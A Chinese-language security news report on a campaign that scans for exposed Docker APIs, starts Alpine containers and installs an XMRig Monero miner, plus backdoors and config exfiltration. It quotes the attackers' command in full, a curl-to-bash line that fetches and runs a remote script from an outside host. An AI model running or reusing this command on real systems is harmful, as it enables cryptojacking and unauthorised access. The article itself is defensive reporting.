隨著愈來愈多關鍵應用搬上Docker,也成為駭客下手的目標。安全廠商發現駭客近日正在網路上掃瞄曝露出的API,意圖植入挖礦程式利用受害者系統資源謀利,還會關閉系統的防護機制或留下後門。
Bad Packets偵測到從本周日(11月24日)午夜起,出現針對Docker系統的罕見大量掃瞄網路活動,利用掃瞄工具Zmap掃瞄TCP port 2375、2376、2377、4243。這波流量疑似是駭客攻擊前的偵察性掃瞄。
ZDNet引述Bad Packets公司研究長Troy Mursch報導,目前駭客一共掃瞄了高達近5.9萬個IP網路來尋找曝露的Docker執行個體。一旦找到受害系統的API,攻擊者就會利用API端點啟用Alpine Linux容器,並執行指令「chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash」。此一指令可用於下載、執行Bash script,目的在安裝Monero挖礦程式XMRig。而在觀察到這波流量後2天,駭客已經挖到價值740美元的Monero幣。
安全公司另外還發現,駭客還會透過一台遠端伺服器下載script到受害Docker系統上,企圖關閉已知的防火牆及其他安全防護、刪除別的挖礦殭屍網路的程式行程,且掃瞄、加密受害主機上的rConfig設定檔,將之傳到駭客的C&C伺服器。另一家安全業者SandflySecurity 分析則顯示它還會留下後門帳號、SSH金鑰,以及變更主機設定,以便未來更方便控制及存取主機。
安全公司建議用戶儘速關閉Docker API傳輸埠,並刪除掉所有不認識的容器。